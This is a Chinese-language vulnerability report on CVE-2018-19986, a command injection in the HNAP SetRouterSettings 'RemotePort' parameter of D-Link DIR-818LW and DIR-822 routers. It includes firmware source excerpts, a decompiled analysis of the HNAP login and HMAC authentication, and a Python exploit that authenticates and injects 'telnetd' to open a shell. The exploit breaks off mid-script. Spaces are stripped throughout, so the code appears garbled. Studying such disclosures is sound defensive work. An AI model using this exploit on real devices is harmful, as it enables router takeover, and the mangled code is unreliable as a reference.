（CVE-2018-19986）D-Link DIR-818LW 828漏洞報(bào)告漏洞代碼報(bào)告

（CVE-2018-19986）D-LinkDIR-818LW&828命令注入漏洞一、漏洞簡(jiǎn)介D-LinkDIR-822和D-LinkDIR-818LW都是中國(guó)臺(tái)灣友訊（D-Link）公司的一款無(wú)線路由器。D-LinkDIR-818LWRev.A2.05.B03和DIR-822B1202KRb06中的‘RemotePort’參數(shù)存在命令注入漏洞。該漏洞源于外部輸入數(shù)據(jù)構(gòu)造可執(zhí)行命令過(guò)程中，網(wǎng)絡(luò)系統(tǒng)或產(chǎn)品未正確過(guò)濾其中的特殊元素。攻擊者可利用該漏洞執(zhí)行非法命令。二、漏洞影響D-LinkDIR-818LWRev.A2.05.B03DIR-822B1202KRb06三、復(fù)現(xiàn)過(guò)程漏洞分析原理D-LinkDIR-818LWRev.A2.05.B03和DIR-822B1202KRb06中，通過(guò)HNAP1協(xié)議訪問(wèn)SetRouterSettings時(shí)，RemotePort參數(shù)存在操作系統(tǒng)命令注入漏洞。在SetRouterSettings.php源碼中，RemotPort參數(shù)沒(méi)有經(jīng)過(guò)任何檢查，直接存放于$path_inf_wan1."/web"，并且在iptwan.php中的IPTWAN_build_command函數(shù)中使用$path_inf_wan1."/web"變量作為iptables的參數(shù)，同樣未做檢查。構(gòu)造SetRouterSettings.xml，使RemotePort中包含如telnetd的shell命令，利用該漏洞執(zhí)行非法操作系統(tǒng)命令。./etc/templates/hnap/SetRouterSettings.php：$path_inf_wan1=XNODE_getpathbytarget("","inf","uid",$WAN1,0);

#$WAN1="WAN-1";

$nodebase="/runtime/hnap/SetRouterSettings/";

……

$remotePort=query($nodebase."RemotePort");

……

set($path_inf_wan1."/web",$remotePort);./etc/services/IPTABLES/iptwan.phpfunctionIPTWAN_build_command($name){

$path=XNODE_getpathbytarget("","inf","uid",$name,0);

……

$web=query($path."/web");

……

#web作為iptables的參數(shù)寫入$_GLOBALS["START"]

if(query($path."/inbfilter")!="")

$inbfn=cut(query($path."/inbfilter"),1,"-");

$hostip=query($path."/weballow/hostv4ip");

if($hostip!="")

{

if(query($path."/inbfilter")!="")fwrite("a",$_GLOBALS["START"],$iptcmd."-ptcp--dport".$web.""."-jCK_INBOUND".$inbfn."\n");

fwrite("a",$_GLOBALS["START"],$iptcmd."-s".$hostip."-ptcp--dport".$web."-jACCEPT\n");

}

else

{

if(query($path."/inbfilter")!="")fwrite("a",$_GLOBALS["START"],$iptcmd."-ptcp--dport".$web.""."-jCK_INBOUND".$inbfn."\n");

fwrite("a",$_GLOBALS["START"],$iptcmd."-ptcp--dport".$web."-jACCEPT\n");

}

……

}PS：服務(wù)器的web目錄為/htdocs/web/關(guān)于HNAPTheHomeNetworkAdministrationProtocol(HNAP)isanHTTP-SimpleObjectAccessProtocol(SOAP)-basedprotocolthatcanbeimplementedinsideofnetworkdevicestoallowadvancedprogrammaticconfigurationandmanagementbyremoteentities.HNAP是由PureNetworks開發(fā)的協(xié)議，后續(xù)由Cisco管理與開發(fā)。HNAP用于網(wǎng)絡(luò)設(shè)備之間的交互，該協(xié)議基于SOAP和HTTP，以post的方式發(fā)包。使用HNAP：在HTTPheader中加入SOAPAction，該字段中會(huì)指明請(qǐng)求的操作，如Login，并向http://[ip]/HNAP1發(fā)送數(shù)據(jù)，數(shù)據(jù)形式為xml。舉個(gè)栗子，下圖是登錄時(shí)的抓包：向路由器發(fā)送數(shù)據(jù)，在SOAPAction中指定了請(qǐng)求內(nèi)容。路由器收到之后以LoginResponse回復(fù)發(fā)送方，返回了一些登錄需要的關(guān)鍵數(shù)據(jù).發(fā)送方收到之后，login的action由request變成了login，即發(fā)送用戶名密碼的過(guò)程，密碼是由用戶私鑰處理過(guò)的數(shù)據(jù)。路由器驗(yàn)證登錄的用戶名和密碼，返回登錄成功信息。理解HNAP為了再深入理解HNAP，查看/htdocs/cgibin二進(jìn)制文件，簡(jiǎn)化流程如下：hnap_main(){

memset(acStack1708,0,0x100);

getenv("HTTP_AUTHORIZATION");

soapaction=getenv("HTTP_SOAPACTION");

request_method=getenv("REQUEST_METHOD");

hnap_auth=getenv("HTTP_HNAP_AUTH");

cookie=getenv("HTTP_COOKIE");

referer=getenv("HTTP_REFERER");

memset(php_path,0,0x100);

//當(dāng)未指定soapaction時(shí)，默認(rèn)請(qǐng)求為GetDeviceSettings

if(soapaction==(char*)0x0){

soapaction="/HNAP1/GetDeviceSettings";

……

}

else{

……

__s1=strstr(soapaction,"/HNAP1/Login");

if(__s1!=(char*)0x0){

……

parse_param_value(uVar2,"Action",action);

parse_param_value(uVar2,"Username",username);

parse_param_value(uVar2,"LoginPassword",pwd);

parse_param_value(uVar2,"Captcha",captcha);

iVar1=strcmp(action,"request");

//當(dāng)action為request時(shí)

if(iVar1==0){

//產(chǎn)生一個(gè)長(zhǎng)度為0X32的隨機(jī)字符串

//例：LVy04tz2fCRlZIu8vefr1OCKu9qTOQaktWkwOhy3rNnQfhWaKB

get_random_string(random_string,0x32);

//cookie_value為前十個(gè)字符

//例：LVy04tz2fC

strncpy(cookie_value,random_string,10);

//challenge為接下來(lái)20個(gè)字符

//例：RlZIu8vefr1OCKu9qTOQ

strncpy(random_challenge,random_string_10,0x14);

//publickey為接下來(lái)20個(gè)字符

//例：aktWkwOhy3rNnQfhWaKB

strncpy(public_key,random_string_30,0x14);

sprintf(public_key_and_0,"%s%s",public_key,0);

strcpy(COOKIE,cookie_value);

strcpy(CHALLENGE,random_challenge);

//HMAC_MD5就是常見的HMAC，hash算法為MD5。這里函數(shù)的輸出放在第三個(gè)參數(shù)中

//例：hmac_1=E188583458DE427B6A71C2DD04CB632C

HMAC_MD5(random_challenge,public_key_and_0,hmac_1);

……

//setchallenge,privatekey,captcha

//返回soapxml

}//endofaction=request

else{

if(strcmp(action,"login")==0&&cookie!=0)

{

find_uid=strstr(cookie,"uid=");

if(find_uid==(char*)0x0)gotoLAB_004137fc;

//獲取cookie的值

strncpy(cookie_value,find_uid+4,10);

//檢查cookie

__fd=get_cgdata_by_uid(acStack1904,cookie_value);

if(__fd<0){

iVar1=-2;

gotoLAB_004137fc;

}

……

//由HMAC計(jì)算口令，以hmac_1作為key,對(duì)challenge進(jìn)行hmac

HMAC_MD5(CHALLENGE,hmac_1,PWD);

……

//將計(jì)算的口令與發(fā)送方中的口令比較

__fd=strcmp((char*)PWD,pwd);

if(__fd==0){

login_response_xml("success");

……

}

}//endofaction=login

}

}//endofLogin

//不是login的情況

if(hnap_auth!=(char*)0x0){

……

//hnap_auth用空格分為兩部分

auth_1=strtok(hnap_auth,"");

auth_2=strtok((char*)0x0,"");

//將auth_2和soapaction連接起來(lái)

strcpy(auth_2_soapaction,auth_2);

strcat(auth_2_soapaction,soapaction);

……

HMAC_MD5(auth_2_soapaction,hmac_1,HMAC_AUTH);

//比較auth_1和計(jì)算后的值

__fd=strcmp(auth_1,HMAC_AUTH);

if(__fd==0){

……

//如果不是Logout，就跳轉(zhuǎn)到0x413330

__format=strstr(soapaction,"/HNAP1/Logout");

if(__format==(char*)0x0)gotoLAB_00413330;

……

}

}//endofsoapaction!=0

LAB_00413330:

//在soapaction中查找最后一個(gè)“/”之后的內(nèi)容為operation

__format=strrchr(soapaction,0x2f);

operation=__format+1;

if(__format!=(char*)0x0){

sVar3=strlen(operation);

if(operation[sVar3-1]=='\"'){

operation[sVar3-1]=0;

}

//hnap相關(guān)的php都在/etc/templates/hnap下

snprintf(php_path,0x100,"%s/%s.php","/etc/templates/hnap/",operation);

//判斷與請(qǐng)求相關(guān)的php是否存在，0為存在

iVar1=access(php_path,0);

if(iVar1==0){

……

snprintf(acStack1708,0x100,"%s%s.php\nShellPath=%s%s.sh\nPrivateKey=%s\n",

"/etc/templates/hnap/",operation,&var_run,operation,&DAT_00438344);

sobj_add_string(iVar4,acStack1708);

……

uVar2=sobj_get_string();

//該函數(shù)會(huì)建立一個(gè)socket并把上面的acStack1708字符發(fā)送給socket；這個(gè)socket是與本地的xmldb_sock建立的，理解為發(fā)送給本地以執(zhí)行對(duì)應(yīng)的php

xmldbc_ephp(0,0,uVar2,stdout);

……

snprintf(acStack1708,0x100,"%s",operation);

iVar4=FUN_004125c8(acStack1708,"/etc/templates/hnap//.shell_action");

//這里無(wú)論如何都會(huì)為format賦值，內(nèi)容是執(zhí)行一個(gè)sh腳本的命令

if(iVar4==0){

__format="sh%s%s.sh>/dev/console";

}

else{

__format="sh%s%s.sh>/dev/console&";

}

//執(zhí)行該腳本

//var_run變量對(duì)應(yīng)的字符是"/var/run/"

snprintf(acStack1708,0x100,__format,&var_run,operation);

system(acStack1708);

……

}漏洞執(zhí)行順序在上面的hnap_main代碼中，代入本漏洞SetRouterSettings的情況，最后會(huì)執(zhí)行sh/var/run/SetRouterSettings.sh，這個(gè)腳本是動(dòng)態(tài)生成的，在模擬固件并執(zhí)行poc成功之后查看內(nèi)容（還沒(méi)找到具體生成sh腳本的代碼）#!/bin/sh

echo"[$0]-->RouterSettingsChange">/dev/console

eventDBSAVE>/dev/console

serviceHTTP.WAN-1start>/dev/console#here?。?！

xmldbc-s/runtime/hnap/dev_status''>/dev/consoleHTTP.WAN-1是一種服務(wù)，對(duì)應(yīng)于/etc/services/HTTP.WAN-1.php，該服務(wù)會(huì)開啟IPT.WAN-1服務(wù)<?

include"/etc/services/HTTP/httpsvcs.php";

fwrite("w",$START,"#!/bin/sh\n");

fwrite("w",$STOP,"#!/bin/sh\n");

fwrite("a",$START,"serviceIPT.WAN-1restart\n");#here!!!!

fwrite("a",$START,"serviceSTUNNELrestart\n");

httpsetup("WAN-1");

?>/etc/services/IPT.WAN-1.php會(huì)執(zhí)行之前所說(shuō)的iptables命令<?

include"/htdocs/phplib/trace.php";

include"/etc/services/IPTABLES/iptwan.php";

IPTWAN_build_command("WAN-1");

?>漏洞復(fù)現(xiàn)importrequests

importtelnetlib

fromhashlibimportmd5

importtime

importmath

trans_5C="".join(chr(x^0x5c)forxinxrange(256))

trans_36="".join(chr(x^0x36)forxinxrange(256))

blocksize=md5().block_size

defhmac_md5(key,msg):

iflen(key)>blocksize:

key=md5(key).digest()

key+=chr(0)*(blocksize-len(key))

o_key_pad=key.translate(trans_5C)

i_key_pad=key.translate(trans_36)

returnmd5(o_key_pad+md5(i_key_pad+msg).digest())

defHNAP_AUTH(SOAPAction,privateKey):

b=math.floor(int(time.time()))%2000000000

b=str(b)[:-2]

h=hmac_md5(privateKey,b+'"/HNAP1/'+SOAPAction+'"').hexdigest().upper()

returnh+""+b

#輸入IP和admin口令，通過(guò)讀hnap_main的二進(jìn)制，理解初始狀態(tài)admin的口令為空（public_key_0：0代表空值）

IP=''

adminPw=''

command="telnetd"#commandinjectionid

headers=requests.utils.default_headers()

headers["User-Agent"]="Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/56.0.2924.76Safari/537.36"

headers["SOAPAction"]='"/HNAP1/Login"'

headers["Origin"]="http://"+IP

headers["Referer"]="http://"+IP+"/info/Login.html"

headers["Content-Type"]="text/xml;charset=UTF-8"

headers["X-Requested-With"]="XMLHttpRequest"

#構(gòu)造一個(gè)action為request的請(qǐng)求發(fā)送給Login

payload='<?xmlversion="1.0"encoding="utf-8"?><soap:Envelopexmlns:xsi="/2001/XMLSchema-instance"xmlns:xsd="/2001/XMLSchema"xmlns:soap="/soap/envelope/"><soap:Body><Loginxmlns="/HNAP1/"><Action>request</Action><Username>Admin</Username><LoginPassword></LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'

r=requests.post('http://'+IP+'/HNAP1/',headers=headers,data=payload)

data=r.text

#通過(guò)獲取的publickey計(jì)算privatekey，根據(jù)privatekey計(jì)算口令的hmac(在上文中對(duì)應(yīng)的是hmac_1)

challenge=str(data[data.find("<Challenge>")+11:data.find("</Challenge>")])

cookie=data[data.find("<Cookie>")+8:data.find("</Cookie>")]

publicKey=str(data[data.find("<PublicKey>")+11:data.find("</PublicKey>")])

privateKey=hmac_md5(publicKey+adminPw,challenge).hexdigest().upper()

password=hmac_md5(priv